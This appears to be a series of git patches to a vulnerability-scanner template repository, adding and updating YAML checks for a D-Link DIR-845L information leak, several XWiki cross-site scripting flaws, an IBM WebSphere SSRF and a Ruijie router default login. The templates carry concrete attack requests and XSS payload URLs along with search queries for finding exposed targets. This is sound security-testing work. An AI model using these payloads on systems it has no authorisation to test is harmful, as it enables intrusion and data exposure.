https://github.com/wy876/POC/blob/main/%E9%94%90%E6%98%8E%E6%8A%80%E6%9C%AFCrocus%E7%B3%BB%E7%BB%9FService.do%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md metadata: From 1001875940b2cf225c0408c4964253e397bffebe Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 4 Jul 2024 10:34:41 +0000 Subject: [PATCH 0900/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 6690ddc848..b4e3ea4b8a 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -20,6 +20,7 @@ on: - 'http/cves/2024/CVE-2024-37881.yaml' - 'http/cves/2024/CVE-2024-4434.yaml' - 'http/cves/2024/CVE-2024-5522.yaml' + - 'http/cves/2024/CVE-2024-5947.yaml' - 'http/cves/2024/CVE-2024-6028.yaml' - 'http/default-logins/apache/apache-apollo-default-login.yaml' - 'http/default-logins/caprover/caprover-default-login.yaml' From a56d8731c99dd39ced922d5412980d8faf666542 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Jul 2024 10:37:22 +0000 Subject: [PATCH 0901/1841] Auto Generated Templates Checksum [Thu Jul 4 10:37:22 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index c353ba6ead..0eefb30ded 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3459,7 +3459,7 @@ http/cves/2024/CVE-2024-34470.yaml:9e15fe4d83b7f511f9e363252311ce0fca2208d8 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 http/cves/2024/CVE-2024-34982.yaml:68453463b4c080e16f4b23e4bcf22565276f0e20 http/cves/2024/CVE-2024-3552.yaml:0994d94f6f8b7ea5f3774e6b4fbc542a57369f6e -http/cves/2024/CVE-2024-36401.yaml:2e0f10aacc4072d68d8cc25058fe304485e7d212 +http/cves/2024/CVE-2024-36401.yaml:9ce37b567a44a508495f69a3ecda745d30a6dcd1 http/cves/2024/CVE-2024-36412.yaml:3dab338da4cd060aacc90a2c21159bf56c95bdff http/cves/2024/CVE-2024-36527.yaml:eb2651a0ee32128fdfe8ae24c72f5d61a1a7f68e http/cves/2024/CVE-2024-36837.yaml:65450880230a57a47c4dbf8b268af022ab009189 @@ -7957,6 +7957,7 @@ http/vulnerabilities/other/comtrend-password-exposure.yaml:4b467b63417a015779922 http/vulnerabilities/other/core-chuangtian-cloud-rce.yaml:dd31a616cc27638f7ecfdb91a7dede86b1547563 http/vulnerabilities/other/couchdb-adminparty.yaml:384135b692266f05a5bc9e507fd3f4385e8cea2d http/vulnerabilities/other/crawlab-lfi.yaml:124a1ad1f04cf5c4d9a1821b3ebe29cba5cc9ca2 +http/vulnerabilities/other/crocus-lfi.yaml:a59b09f918eae8ec71c98e416cf6c7bfc1d29e09 http/vulnerabilities/other/crystal-live-server-lfi.yaml:ae6114c40d666570e17f1b4f2a285ddea6fa727f http/vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml:241ee9a519cfff44caeb125dd2115d6a8177d379 http/vulnerabilities/other/csz-cms-sqli.yaml:6ad14e7027dcc881e16079bf26a66c3161aec50f @@ -8834,7 +8835,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:5581aa635a36465f8c29530d8484c309a35d67cb +templates-checksum.txt:855ec34c59d29ae0a7fb5df9b9533de657d442ab wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From fd36934b73b921b153e5b33ad09aeb6372a11b4a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Jul 2024 10:39:04 +0000 Subject: [PATCH 0902/1841] Auto Template Signing [Thu Jul 4 10:39:04 UTC 2024] :robot: --- http/cves/2024/CVE-2024-5947.yaml | 1 + http/vulnerabilities/other/crocus-lfi.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/cves/2024/CVE-2024-5947.yaml b/http/cves/2024/CVE-2024-5947.yaml index d80e8e940f..3a71a16822 100644 --- a/http/cves/2024/CVE-2024-5947.yaml +++ b/http/cves/2024/CVE-2024-5947.yaml @@ -45,3 +45,4 @@ http: - 'contains(content_type,"Unknown")' - 'status_code == 200' condition: and +# digest: 4b0a00483046022100f14e5dff551bad0f216e8edc91cfd4c2cadc7d37baf36247886eece90dd58c1e0221009673d4928258a44eac8cece1dcd71fbec2bc2fe77f56e0f46b6f8b2aac07ac0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/crocus-lfi.yaml b/http/vulnerabilities/other/crocus-lfi.yaml index 21babae9c2..e5f841fcb4 100644 --- a/http/vulnerabilities/other/crocus-lfi.yaml +++ b/http/vulnerabilities/other/crocus-lfi.yaml @@ -34,3 +34,4 @@ http: - type: status status: - 200 +# digest: 4a0a0047304502200f8590dc8802a5d6f0babb590f072c0645ccdb13fbe916b5bbbb3576ecc1c3da022100a0d861b7f1aad6360817cc34507a4aace3e372817b86e67806adc398b4c4de66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 4e77701dbf8781485146ccca5d92b34e358f6eff Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 4 Jul 2024 16:14:42 +0530 Subject: [PATCH 0903/1841] Update ruijie-nbr-default-login.yaml --- http/default-logins/ruijie/ruijie-nbr-default-login.yaml | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/http/default-logins/ruijie/ruijie-nbr-default-login.yaml b/http/default-logins/ruijie/ruijie-nbr-default-login.yaml index 023739bc74..3885d92336 100644 --- a/http/default-logins/ruijie/ruijie-nbr-default-login.yaml +++ b/http/default-logins/ruijie/ruijie-nbr-default-login.yaml @@ -1,11 +1,11 @@ id: ruijie-nbr-default-login info: - name: Ruijie NBR Series routers - Default Login + name: Ruijie NBR Series Routers - Default Login author: pussycat0x severity: high description: | - This template detects Ruijie NBR Series routers Default Login + Ruijie NBR Series Routers Default Login username and password was discovered. metadata: max-request: 1 verified: true @@ -17,11 +17,9 @@ http: - | POST /login.cgi HTTP/1.1 Host: {{Hostname}} - Content-Length: 26 Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded Referer: {{RootURL}}/login.html - Accept-Encoding: gzip, deflate, br user={{username}}&password={{password}} From 71778be1157b628cb0b7ddc945e34546c1a08c5d Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 4 Jul 2024 16:25:02 +0530 Subject: [PATCH 0904/1841] Create CVE-2024-33113.yaml --- http/cves/2024/CVE-2024-33113.yaml | 33 ++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 http/cves/2024/CVE-2024-33113.yaml diff --git a/http/cves/2024/CVE-2024-33113.yaml b/http/cves/2024/CVE-2024-33113.yaml new file mode 100644 index 0000000000..da1ba1079c --- /dev/null +++ b/http/cves/2024/CVE-2024-33113.yaml @@ -0,0 +1,33 @@ +id: CVE-2024-33113 + +info: + name: D-LINK DIR-845L bsc_sms_inbox.php file - Information Disclosure + author: pussycat0x + severity: medium + description: | + CVE-2024-33113 is a vulnerability in the D-LINK DIR-845L router that allows information disclosure through the bsc_sms_inbox.php file. The vulnerability arises from improper handling of the include() function, which can be exploited by manipulating the $file variable. This allows attackers to include arbitrary PHP scripts and potentially retrieve sensitive information such as the router's username and password. + reference: + - https://github.com/FaLLenSKiLL1/CVE-2024-33113 + metadata: + max-request: 1 + verified: true + shodan-query: DIR-845L + tags: cve,cve2024,dlink + +http: + - method: GET + path: + - "{{BaseURL}}/getcfg.php?a=%0A_POST_SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DEVICE.ACCOUNT" + - "" + condition: and + + - type: status + status: + - 200 From 71de94bec14202637daf5b8f5ed884e262175485 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 4 Jul 2024 16:28:19 +0530 Subject: [PATCH 0905/1841] Update CVE-2024-33113.yaml --- http/cves/2024/CVE-2024-33113.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-33113.yaml b/http/cves/2024/CVE-2024-33113.yaml index da1ba1079c..50d01508fc 100644 --- a/http/cves/2024/CVE-2024-33113.yaml +++ b/http/cves/2024/CVE-2024-33113.yaml @@ -5,12 +5,18 @@ info: author: pussycat0x severity: medium description: | - CVE-2024-33113 is a vulnerability in the D-LINK DIR-845L router that allows information disclosure through the bsc_sms_inbox.php file. The vulnerability arises from improper handling of the include() function, which can be exploited by manipulating the $file variable. This allows attackers to include arbitrary PHP scripts and potentially retrieve sensitive information such as the router's username and password. + D-LINK DIR-845L <=v1.01KRb03 is vulnerable to Information disclosurey via bsc_sms_inbox.php. reference: - https://github.com/FaLLenSKiLL1/CVE-2024-33113 + - https://github.com/yj94/Yj_learning/blob/main/Week16/D-LINK-POC.md + - https://github.com/yj94/Yj_learning + - https://github.com/fkie-cad/nvd-json-data-feeds + classification: + epss-score: 0.00043 + epss-percentile: 0.0866 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: DIR-845L tags: cve,cve2024,dlink From 9bbd59ed3a4df003bcc3cc4eda6c8b49df2c05d4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 4 Jul 2024 16:11:53 +0400 Subject: [PATCH 0906/1841] Update CVE-2021-27748.yaml --- http/cves/2021/CVE-2021-27748.yaml | 25 ++++++++++++++++--------- 1 file changed, 16 insertions(+), 9 deletions(-) diff --git a/http/cves/2021/CVE-2021-27748.yaml b/http/cves/2021/CVE-2021-27748.yaml index 471a3628f9..8e8e5a9a25 100644 --- a/http/cves/2021/CVE-2021-27748.yaml +++ b/http/cves/2021/CVE-2021-27748.yaml @@ -22,27 +22,34 @@ info: shodan-query: http.html:"IBM WebSphere Portal" tags: cve2021,cve,hcl,ibm,ssrf,websphere +flow: http(1) && http(2) + http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + max-redirects: 2 + matchers: + - type: word + internal: true + words: + - "IBM WebSphere Portal" + - method: GET path: - - '{{BaseURL}}' - '{{BaseURL}}/docpicker/internal_proxy/http/oast.me' - '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/oast.me' host-redirects: true max-redirects: 2 stop-at-first-match: true - matchers-condition: and matchers: - type: word part: body words: - "Interactsh Server" - - - type: word - part: body_1 - words: - - "Interactsh Server" - negative: true -# digest: 490a0046304402200ba3597e1cd51ea49029981ba317f0f962cc8082d2f3796e4d59fc9138bf9d9d0220226c8cb7207a0c85488b5ce96a38f6e0b616ebb9b487135b1fda864f9d6503d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200ba3597e1cd51ea49029981ba317f0f962cc8082d2f3796e4d59fc9138bf9d9d0220226c8cb7207a0c85488b5ce96a38f6e0b616ebb9b487135b1fda864f9d6503d2:922c64590222798bb761d5b6d8e72950 From d7cc1956eb36cb099852d691fd4e6298853e6b19 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 4 Jul 2024 12:15:39 +0000 Subject: [PATCH 0907/1841] Auto Generated New Template Addition List [Thu Jul 4 12:15:39 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index d307d82989..eda0d2b10a 100644 --- a/.new-additions +++ b/.new-additions @@ -21,6 +21,7 @@ http/default-logins/apache/apache-apollo-default-login.yaml http/default-logins/caprover/caprover-default-login.yaml http/default-logins/dialogic/dialogic-xms-default-login.yaml http/default-logins/jeedom/jeedom-default-login.yaml +http/default-logins/ruijie/ruijie-nbr-default-login.yaml http/exposed-panels/apache/apache-apollo-panel.yaml http/exposed-panels/dialogic-xms-console.yaml http/exposed-panels/endpoint-protector-panel.yaml @@ -42,4 +43,5 @@ http/vulnerabilities/backdoor/polyfill-backdoor.yaml http/vulnerabilities/next-js-cache-poisoning.yaml http/vulnerabilities/other/azon-dominator-sqli.yaml http/vulnerabilities/other/bagisto-csti.yaml +http/vulnerabilities/other/crocus-lfi.yaml http/vulnerabilities/other/sharp-printers-lfi.yaml From 8469b3158494138df4cd1ffd5c3af6d7f82abebd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Jul 2024 12:15:48 +0000 Subject: [PATCH 0908/1841] Auto Generated Templates Checksum [Thu Jul 4 12:15:48 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 0eefb30ded..dbe2273f3b 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3477,7 +3477,7 @@ http/cves/2024/CVE-2024-4577.yaml:c53e4d3f699e49597036f2b9e5ea8ab75e67904b http/cves/2024/CVE-2024-4956.yaml:c6be2d64ff4b985c30acc88c57c66d57a846d25a http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c http/cves/2024/CVE-2024-5522.yaml:1aae46b20c03316823691aa8755eb8e35b46533a -http/cves/2024/CVE-2024-5947.yaml:4d8ef0dca22f3e2c4e5e01b65266926e283485b7 +http/cves/2024/CVE-2024-5947.yaml:1007c228fb459bf995a9b759b10c668e190ab1e6 http/cves/2024/CVE-2024-6028.yaml:5bb353f3acbac441334cb7219e4198515178e991 http/default-logins/3com/3Com-wireless-default-login.yaml:80e8ff28f6fe58cd692d51a649e382978ba730c3 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce @@ -3631,6 +3631,7 @@ http/default-logins/riello/netman-default-login.yaml:ac5150c7d6dfa9fec6fc1b585ba http/default-logins/rockmongo/rockmongo-default-login.yaml:8772a7f8d293629854953490e97aaccd74ca394e http/default-logins/rseenet/rseenet-default-login.yaml:239c2ec95822a7b21fa4bd9bf9a4a6a640a6d531 http/default-logins/ruckus/ruckus-wireless-default-login.yaml:f6eed5ce468a58c00c2ed828fd4b4c54ed4711eb +http/default-logins/ruijie/ruijie-nbr-default-login.yaml:3a2fc208dadb91ea00eb932f407787ba1971ccb3 http/default-logins/samsung/samsung-printer-default-login.yaml:04c2f1031b247cfe6f3ee76e2ca5ff21e1629e21 http/default-logins/samsung/samsung-wlan-default-login.yaml:c0981f37d035a88bd4138a86329f463f751bf239 http/default-logins/seeddms/seeddms-default-login.yaml:9b9d566def0bfca23f1880f29e07be5865b21a02 @@ -7957,7 +7958,7 @@ http/vulnerabilities/other/comtrend-password-exposure.yaml:4b467b63417a015779922 http/vulnerabilities/other/core-chuangtian-cloud-rce.yaml:dd31a616cc27638f7ecfdb91a7dede86b1547563 http/vulnerabilities/other/couchdb-adminparty.yaml:384135b692266f05a5bc9e507fd3f4385e8cea2d http/vulnerabilities/other/crawlab-lfi.yaml:124a1ad1f04cf5c4d9a1821b3ebe29cba5cc9ca2 -http/vulnerabilities/other/crocus-lfi.yaml:a59b09f918eae8ec71c98e416cf6c7bfc1d29e09 +http/vulnerabilities/other/crocus-lfi.yaml:c8a0d15b5a6be90113f2804a107b25cab5216344 http/vulnerabilities/other/crystal-live-server-lfi.yaml:ae6114c40d666570e17f1b4f2a285ddea6fa727f http/vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml:241ee9a519cfff44caeb125dd2115d6a8177d379 http/vulnerabilities/other/csz-cms-sqli.yaml:6ad14e7027dcc881e16079bf26a66c3161aec50f @@ -8835,7 +8836,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:855ec34c59d29ae0a7fb5df9b9533de657d442ab +templates-checksum.txt:ad16a2cf4c7479f4fd5cca2161de6955c19a640f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From a26c123bdaff6a11d8393f49c72eb85e1b7dd914 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 4 Jul 2024 17:46:31 +0530 Subject: [PATCH 0909/1841] Update CVE-2024-33113.yaml --- http/cves/2024/CVE-2024-33113.yaml | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/http/cves/2024/CVE-2024-33113.yaml b/http/cves/2024/CVE-2024-33113.yaml index 50d01508fc..1546647ad3 100644 --- a/http/cves/2024/CVE-2024-33113.yaml +++ b/http/cves/2024/CVE-2024-33113.yaml @@ -9,16 +9,14 @@ info: reference: - https://github.com/FaLLenSKiLL1/CVE-2024-33113 - https://github.com/yj94/Yj_learning/blob/main/Week16/D-LINK-POC.md - - https://github.com/yj94/Yj_learning - - https://github.com/fkie-cad/nvd-json-data-feeds classification: epss-score: 0.00043 epss-percentile: 0.0866 metadata: verified: true max-request: 1 - shodan-query: DIR-845L - tags: cve,cve2024,dlink + shodan-query: "DIR-845L" + tags: cve,cve2024,dlink,info-leak http: - method: GET From 637acd77caf868724776440b6a00db9966973b0c Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 4 Jul 2024 12:16:33 +0000 Subject: [PATCH 0910/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index b4e3ea4b8a..4adacd5b71 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -26,6 +26,7 @@ on: - 'http/default-logins/caprover/caprover-default-login.yaml' - 'http/default-logins/dialogic/dialogic-xms-default-login.yaml' - 'http/default-logins/jeedom/jeedom-default-login.yaml' + - 'http/default-logins/ruijie/ruijie-nbr-default-login.yaml' - 'http/exposed-panels/apache/apache-apollo-panel.yaml' - 'http/exposed-panels/dialogic-xms-console.yaml' - 'http/exposed-panels/endpoint-protector-panel.yaml' @@ -47,6 +48,7 @@ on: - 'http/vulnerabilities/next-js-cache-poisoning.yaml' - 'http/vulnerabilities/other/azon-dominator-sqli.yaml' - 'http/vulnerabilities/other/bagisto-csti.yaml' + - 'http/vulnerabilities/other/crocus-lfi.yaml' - 'http/vulnerabilities/other/sharp-printers-lfi.yaml' workflow_dispatch: jobs: From 503c4d663c6b5bed3da66f13bc79eb28bde626df Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 4 Jul 2024 17:46:40 +0530 Subject: [PATCH 0911/1841] Create CVE-2023-35156.yaml --- http/cves/2023/CVE-2023-35156.yaml | 54 ++++++++++++++++++++++++++++++ 1 file changed, 54 insertions(+) create mode 100644 http/cves/2023/CVE-2023-35156.yaml diff --git a/http/cves/2023/CVE-2023-35156.yaml b/http/cves/2023/CVE-2023-35156.yaml new file mode 100644 index 0000000000..30cfd45f94 --- /dev/null +++ b/http/cves/2023/CVE-2023-35156.yaml @@ -0,0 +1,54 @@ +id: CVE-2023-35156 + +info: + name: XWiki >= 6.0-rc-1 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the delete template to perform a XSS, e.g. by using URL such as: > xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=delete.vm&xredirect=javascript:alert(document.domain). This vulnerability exists since XWiki 6.0-rc-1. + impact: | + Successful exploitation could lead to cross-site scripting. + remediation: | + This vulnerability has been patched in XWiki 14.10.6,15.1. + reference: + - https://jira.xwiki.org/browse/XWIKI-20341 + - https://nvd.nist.gov/vuln/detail/CVE-2023-35156 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-35156 + cwe-id: CWE-79 + cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + verified: true + vendor: xwiki + product: xwiki + shodan-query: html:"data-xwiki-reference" + fofa-query: body="data-xwiki-reference" + tags: cve,cve2023,xwiki,xss + +http: + - method: GET + path: + - "{{BaseURL}}/xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=delete.vm&xredirect=javascript:alert(document.domain)" + - "{{BaseURL}}/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=delete.vm&xredirect=javascript:alert(document.domain)" + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'cancel" href="javascript:alert(document.domain)' + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 + - 401 From 9c513c4451f7069a30b4539cc7bb591803bac122 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 4 Jul 2024 17:47:03 +0530 Subject: [PATCH 0912/1841] Create CVE-2023-35159.yaml --- http/cves/2023/CVE-2023-35159.yaml | 56 ++++++++++++++++++++++++++++++ 1 file changed, 56 insertions(+) create mode 100644 http/cves/2023/CVE-2023-35159.yaml diff --git a/http/cves/2023/CVE-2023-35159.yaml b/http/cves/2023/CVE-2023-35159.yaml new file mode 100644 index 0000000000..d8a0953e1c --- /dev/null +++ b/http/cves/2023/CVE-2023-35159.yaml @@ -0,0 +1,56 @@ +id: CVE-2023-35159 + +info: + name: XWiki >= 3.4-milestone-1 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the deletespace template to perform a XSS, e.g. by using URL such as: > xwiki/bin/deletespace/Sandbox/?xredirect=javascript:alert(document.domain). + impact: | + Successful exploitation could lead to cross-site scripting. + remediation: | + This vulnerability has been patched in XWiki 14.10.5,15.1-rc-1. + reference: + - https://jira.xwiki.org/browse/XWIKI-20612 + - https://nvd.nist.gov/vuln/detail/CVE-2023-35159 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-35159 + cwe-id: CWE-79 + cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + verified: true + vendor: xwiki + product: xwiki + shodan-query: html:"data-xwiki-reference" + fofa-query: body="data-xwiki-reference" + tags: cve,cve2023,xwiki,xss + +http: + - method: GET + path: + - "{{BaseURL}}/xwiki/bin/deletespace/Sandbox/?xredirect=javascript:alert(document.domain)" + - "{{BaseURL}}/bin/deletespace/Sandbox/?xredirect=javascript:alert(document.domain)" + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'javascript:alert(document.domain)' + - 'deletespace.Sandbox' + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 + - 401 From 21f252b90e04da0911a4f529b2c58d804558cb61 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 4 Jul 2024 17:47:21 +0530 Subject: [PATCH 0913/1841] Create CVE-2023-35160.yaml --- http/cves/2023/CVE-2023-35160.yaml | 56 ++++++++++++++++++++++++++++++ 1 file changed, 56 insertions(+) create mode 100644 http/cves/2023/CVE-2023-35160.yaml diff --git a/http/cves/2023/CVE-2023-35160.yaml b/http/cves/2023/CVE-2023-35160.yaml new file mode 100644 index 0000000000..155afa4bae --- /dev/null +++ b/http/cves/2023/CVE-2023-35160.yaml @@ -0,0 +1,56 @@ +id: CVE-2023-35160 + +info: + name: XWiki >= 2.5-milestone-2 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the resubmit template to perform a XSS, e.g. by using URL such as: > xwiki/bin/view/XWiki/Main xpage=resubmit&resubmit=javascript:alert(document.domain)&xback=javascript:alert(document.domain). This vulnerability exists since XWiki 2.5-milestone-2. The vulnerability has been patched in XWiki 14.10.5 and 15.1-rc-1. + impact: | + Successful exploitation could lead to cross-site scripting. + remediation: | + This vulnerability has been patched in XWiki 14.10.5,15.1-rc-1. + reference: + - https://jira.xwiki.org/browse/XWIKI-20343 + - https://nvd.nist.gov/vuln/detail/CVE-2023-35160 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-35160 + cwe-id: CWE-79 + cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + verified: true + vendor: xwiki + product: xwiki + shodan-query: html:"data-xwiki-reference" + fofa-query: body="data-xwiki-reference" + tags: cve,cve2023,xwiki,xss + +http: + - method: GET + path: + - "{{BaseURL}}/xwiki/bin/view/XWiki/Main?xpage=resubmit&resubmit=javascript:alert(document.domain)&xback=javascript:alert(document.domain)" + - "{{BaseURL}}/bin/view/XWiki/Main?xpage=resubmit&resubmit=javascript:alert(document.domain)&xback=javascript:alert(document.domain)" + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'action="javascript:alert(document.domain)"' + - 'XWikiGuest' + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 + - 401 From 38ae4f28db5bf67c2440248fa4802543d079f038 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 4 Jul 2024 17:47:40 +0530 Subject: [PATCH 0914/1841] Create CVE-2023-35161.yaml --- http/cves/2023/CVE-2023-35161.yaml | 56 ++++++++++++++++++++++++++++++ 1 file changed, 56 insertions(+) create mode 100644 http/cves/2023/CVE-2023-35161.yaml diff --git a/http/cves/2023/CVE-2023-35161.yaml b/http/cves/2023/CVE-2023-35161.yaml new file mode 100644 index 0000000000..53b34a98fc --- /dev/null +++ b/http/cves/2023/CVE-2023-35161.yaml @@ -0,0 +1,56 @@ +id: CVE-2023-35161 + +info: + name: XWiki >= 6.2-milestone-1 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the DeleteApplication page to perform a XSS, e.g. by using URL such as: > xwiki/bin/view/AppWithinMinutes/DeleteApplication?appName=Menu&resolve=true&xredirect=javascript:alert(document.domain). This vulnerability exists since XWiki 6.2-milestone-1. The vulnerability has been patched in XWiki 14.10.5 and 15.1-rc-1. + impact: | + Successful exploitation could lead to cross-site scripting. + remediation: | + This vulnerability has been patched in XWiki 14.10.5,15.1-rc-1. + reference: + - https://jira.xwiki.org/browse/XWIKI-20614 + - https://nvd.nist.gov/vuln/detail/CVE-2023-35161 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-35161 + cwe-id: CWE-79 + cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + verified: true + vendor: xwiki + product: xwiki + shodan-query: html:"data-xwiki-reference" + fofa-query: body="data-xwiki-reference" + tags: cve,cve2023,xwiki,xss + +http: + - method: GET + path: + - "{{BaseURL}}/xwiki/bin/view/AppWithinMinutes/DeleteApplication?appName=Menu&resolve=true&xredirect=javascript:alert(document.domain)" + - "{{BaseURL}}/bin/view/AppWithinMinutes/DeleteApplication?appName=Menu&resolve=true&xredirect=javascript:alert(document.domain)" + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'javascript:alert(document.domain)' + - 'DeleteApplication' + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 + - 401 From 95840b8a3a6b041b063cbaf5ff3e489a6b4973a1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Jul 2024 12:17:47 +0000 Subject: [PATCH 0915/1841] Auto Template Signing [Thu Jul 4 12:17:47 UTC 2024] :robot: --- http/default-logins/ruijie/ruijie-nbr-default-login.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/default-logins/ruijie/ruijie-nbr-default-login.yaml b/http/default-logins/ruijie/ruijie-nbr-default-login.yaml index 3885d92336..ff82889055 100644 --- a/http/default-logins/ruijie/ruijie-nbr-default-login.yaml +++ b/http/default-logins/ruijie/ruijie-nbr-default-login.yaml @@ -41,3 +41,4 @@ http: - type: status status: - 200 +# digest: 